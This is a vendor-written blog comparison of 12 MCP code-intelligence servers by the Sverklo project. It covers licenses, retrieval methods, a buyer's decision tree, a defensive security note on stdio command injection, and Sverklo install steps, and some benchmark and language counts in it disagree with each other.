Best MCP Servers for Code Intelligence — Honest Comparison of 12 Options (2026)
An opinionated landscape of 12 servers, with a comparison matrix you can actually use. Honest about where Sverklo (the project that wrote this guide) loses.
Contents
What MCP actually is (60 seconds)
Model Context Protocol (MCP) is a JSON-RPC spec that lets a language-model client (Claude Code, Cursor, Windsurf, Cline, Zed, the Cursor SDK, the Anthropic SDK) call external tools the model author didn't ship. Tools live in servers — separate processes the client launches over stdio or talks to over HTTP. Each tool has a name, a schema, and a description; the model picks them up at conversation start and treats them like first-class functions.
The practical effect: instead of waiting for Anthropic to add a "search my repo" tool to Claude, you run a local MCP server that exposes my_repo_search and the agent uses it. The server can do anything — query a database, hit an internal API, run a tree-sitter parser, whatever.
For code intelligence specifically, MCP closes a loop that was previously broken: the agent stops being limited to its built-in grep / read / glob tools and starts seeing the codebase through your retrieval pipeline. That's the whole pitch.
A taxonomy: four kinds of code-intel MCP
The category is less unified than the marketing makes it sound. There are four meaningfully different things people call "code-intel MCP," and mixing them up causes most of the confusion in side-by-side comparisons.
1. Search servers
Index your repo (BM25 / embeddings / both) and answer "find me code about X." Examples: Claude Context (Zilliz), Local Code Search MCP, grepai, Seroost. Strength: cheap exploration. Weakness: no graph, no impact analysis, no memory.
2. Knowledge-graph / structural servers
Build a call graph or symbol graph and let the agent traverse it. Examples: GitNexus, CodeGraphContext, code-graph-mcp, codesight-mcp. Strength: structural queries ("what calls X transitively?"). Weakness: graph-only is bad at semantic recall and weak at ranking; many require Neo4j or Kuzu.
3. LSP-backed semantic servers
Wrap a Language Server Protocol implementation and expose its rename / refs / definition signals as MCP tools. Examples: Serena. Strength: precision (real renames, not regex). Weakness: requires a working LSP per language; configuration-heavy.
4. Hybrid / "all-of-the-above" intelligence servers
Combine search, structure, ranking, and memory. Examples: Sverklo (this site), jcodemunch-mcp (search + tree-sitter symbols), codebase-memory-mcp. Strength: covers more failure modes. Weakness: heavier installs and more complex to evaluate (which is why we wrote a benchmark).
None of these is wrong. They're answers to different questions. The decision tree below walks through which one matches your workload.
The comparison matrix (12 servers)
Numbers verified May 2026. Star counts and license terms change; for a value as load-bearing as the license, click through and read the actual LICENSE file before relying on this table.
| Server | Category | License | Stars | Hosting | Languages | Tools | Retrieval substrate | Memory layer |
|---|---|---|---|---|---|---|---|---|
| Sverklo | Hybrid | MIT | growing | Local (SQLite + ONNX) | 12 | 37 | BM25 + embeddings + PageRank (RRF) | Bi-temporal, git-SHA pinned |
| GitNexus | Knowledge graph | PolyForm Noncommercial 1.0 | ~28-35K | Local (KuzuDB) + browser UI | 14 | ~12 | Cypher graph queries | None |
| Serena | LSP-backed | MIT | ~24K | Local (LSP processes) | 40+ (via LSP) | ~15 | LSP refs/defs/renames | None |
| jcodemunch-mcp | Search + symbols | Dual: free non-commercial; $79–$1,999 commercial | ~1.7K | Local (Python) | 10+ | ~6 | Tree-sitter symbol index | None |
| Claude Context | Search | Apache 2.0 | ~6K | Local + external Milvus | broad | ~5 | BM25 + dense vectors (Milvus) | None |
| codebase-memory-mcp | Hybrid (light) | Open source | ~1.6K | Local (single static binary) | 66 | ~10 | Symbol KG + git-aware diff | Shallow |
| CodeGraphContext | Knowledge graph | MIT | ~3K | Local (Neo4j) | broad | ~8 | Neo4j graph queries | None |
| code-graph-mcp | Knowledge graph | MIT | smaller | Local | 5+ | ~6 | Tree-sitter symbol graph | None |
| Code Pathfinder | Search + AST | Apache 2.0 | smaller | Local | ~6 | ~7 | AST + structural queries | None |
| Local Code Search MCP | Search | MIT | smaller | Local | broad | ~3 | Lexical + simple ranking | None |
| code-review-graph | Hybrid | MIT | ~13.5K | Local (SQLite + FTS5) | 23 | 28 | FTS5 + RRF + optional embeddings | Lite |
| Greptile (not strictly MCP) | Cloud PR review | Closed / paid | n/a | Cloud (their infra) | broad | n/a | Hosted hybrid | Hosted |
Greptile included for completeness — it's the named cloud incumbent in the category, although it doesn't ship as an MCP server. Listed here so the comparison answers the literal question many engineers ask: "open-source alternative to Greptile."
Decision tree: which one for you?
The right question isn't "which is best" — there is no best. It's "which trade-offs do I want to make." Walk this tree top to bottom; the first matching answer is the practical recommendation.
Q1. Can your code legally leave the machine?
No (compliance, regulated industry, customer contract): you need local-first. Skip Greptile entirely. Skip Claude Context if you don't want to run Milvus. Yes: Greptile becomes a viable option for hosted PR review specifically, and you have the full local set as well.
Q2. Is the project commercial?
Yes (any agency, contractor, SaaS, or company that pays anyone to use the tool): you cannot use GitNexus without a separate commercial license from Akon Labs (PolyForm Noncommercial 1.0 forbids it). You cannot use the free tier of jcodemunch-mcp; their commercial tiers run $79–$1,999 depending on team size. MIT-licensed servers (Sverklo, Serena, CodeGraphContext, code-review-graph) are unrestricted. No (personal, OSS contribution, evaluation): all options are open.
Q3. What's your dominant retrieval workload?
- "Find every caller of X" (P2) — a well-tuned ripgrep ties most graph-based servers on this. Surprisingly, smart-grep alone is competitive; the bench numbers are below. If P2 is dominant, skip the heavy infrastructure and just configure ripgrep with sensible defaults.
- "Where is X defined?" (P1) — jcodemunch-mcp is the strongest at 0.65 F1 on the public sverklo bench. Sverklo is at 0.45.
- "What does this codebase do?" / 5-minute mental model — you want PageRank-ranked overviews. Sverklo's
sverklo_overviewand code-review-graph's wiki feature both do this. - "What breaks if I change this?" (P5 / blast radius) — call-graph-aware servers (Sverklo, GitNexus, CodeGraphContext). Don't bother with pure search servers for this question.
- "What did we decide last week?" (memory) — only Sverklo (bi-temporal git-SHA pinned), code-review-graph (lite memory), and codebase-memory-mcp (shallow) have any memory layer. Most others have none.
- "Risk-scored PR review" — Sverklo (
sverklo review), Greptile (cloud bot). Different deployment models; same goal.
Q4. What's the install pain you can absorb?
- None — must be one command. Sverklo (
npm i -g sverklo && sverklo init). codebase-memory-mcp (single binary). That's basically it. - I can install Python and a few deps. Add jcodemunch-mcp, Code Pathfinder.
- I can run a database (Neo4j / Kuzu / Milvus). Add CodeGraphContext, GitNexus, Claude Context.
- I'll set up LSPs per language. Add Serena.
Q5. Do you need a published, reproducible benchmark to defend the choice to your team?
Sverklo is the entry on the matrix above with a peer-reviewable benchmark and reproducible eval harness (sverklo.com/bench) — 90 tasks, 5 baselines, raw data downloadable. The methodology repo at github.com/sverklo/sverklo-bench is open for new baseline submissions. If "we picked X because the vendor said it's best" isn't a defensible answer in your org, having a shared eval matters.
Security PSA (read this even if you skip everything else)
MCP's stdio transport spawns child processes. If the MCP client passes the server command string through a shell, an attacker who controls part of that string can execute arbitrary commands. Anthropic's stance is that this is by design — stdio is intended for local trusted use. That's defensible, but "by design" is also where real users get burned because client implementers shell out via sh -c for convenience.
Four rules:
- Never pass server commands through a shell. Use exec-style spawn.
- Treat any user-controlled config as untrusted input.
- Pin server binaries by absolute path or content hash.
- Sandbox at the OS level (containers, sandbox-exec).
Full writeup with the 30-second audit grep one-liners: MCP STDIO command-injection audit.
Glossary
- MCP (Model Context Protocol)
- JSON-RPC spec for tool servers that LLM clients (Claude Code, Cursor, etc.) call at runtime. Open spec; no Anthropic-only dependency.
- BM25
- Lexical ranking function from classical information retrieval. Fast, deterministic, strong on rare identifiers. Bad at concepts.
- RRF (Reciprocal Rank Fusion)
- Standard way to combine multiple ranked result lists (e.g., BM25 + embeddings) without tuning weights. Simple and surprisingly competitive.
- PageRank on a call graph
- Treats functions as nodes and calls as edges; central functions get higher scores. Used to rank retrieval results so load-bearing code surfaces first.
- Tree-sitter
- Incremental parser library. The de facto AST parser for code-intel servers because it handles incomplete / broken code gracefully.
- Bi-temporal memory
- Memory store that tracks both when a fact was true in the codebase (git SHA) and when the agent learned it (wall clock). Lets agent recall not drift when you
git checkoutback to an older state. - Blast radius
- Set of all functions that could be affected (transitively) by a change to a given function. Computed from the call graph.
- P1, P2, P4, P5
- Sverklo bench category labels: P1 = symbol definition lookup, P2 = reference finding, P4 = file dependencies, P5 = dead code detection. Used throughout the comparison matrix.
- Stdio transport
- MCP's local transport: client spawns server as a subprocess and talks over stdin/stdout. Default for local-first servers. See security PSA above.
Where Sverklo loses (honest section)
This guide is published on the sverklo blog, so the right thing to do is name the cases where sverklo is not the right choice. From the public bench and from real usage:
- jcodemunch-mcp wins P1 (definition lookup) at 0.65 F1 vs sverklo's 0.45. Their tree-sitter symbol indexing is sharper than ours. If you spend most of your time asking "where is X defined?", jcodemunch is the better tool.
- Smart-grep ties sverklo on P2 (reference finding) at 0.50 F1 each. The semantic graph adds nothing to a textually-pure question. If P2 is dominant in your workflow, sverklo is genuinely overkill — well-configured ripgrep is fine.
- Cypher graph expressiveness is something sverklo doesn't offer at all. If you want to write ad-hoc graph queries against your codebase ("show me every function in
auth/that calls something indb/"), GitNexus's Cypher interface is the right tool. - 40+ language coverage via LSPs is Serena's. Sverklo parses 24 languages — 10 first-class (tree-sitter or custom: TS, JS, Python, Go, Rust, C#, Vue, Markdown, Jupyter) and 14 via regex fallback. If your codebase is a polyglot of obscure languages with semantic-correctness requirements, Serena via LSP wins on coverage.
- Cold-start indexing on very large repos. First-time index of a 500K-LOC repo takes ~5 minutes on sverklo. After that it's incremental and fast, but the first run isn't free.
The matrix and decision tree above try to be honest about all of this. The case for sverklo isn't "it wins every category" — it doesn't. The case is: if you need local-first + commercial-friendly + multi-tool surface + persistent memory + an actually-published benchmark, no other server in the matrix offers all five.
What to try first
If you've read this far and want to actually run one of these on a real repo today:
npm install -g sverklo
cd your-project
sverklo init
sverklo receipt # see what your agent has been spending tokens on
sverklo init auto-detects your AI coding agent (Claude Code, Cursor, Windsurf, Zed) and writes the right MCP config. sverklo receipt parses your last week of Claude Code session logs and prints a Spotify-Wrapped-style breakdown of where your tokens went — useful as a baseline before/after.
If sverklo isn't the right pick after reading the decision tree, try one of the others linked in the matrix. Honest landscape post; I'm not pretending the answer is always us.
npm run bench in the repo. 60 tasks, 5 baselines, raw data at sverklo.com/bench. If you find a number wrong, open an issue.
Updated: May 3, 2026 · 3,200 words · MIT-licensed prose, reuse with attribution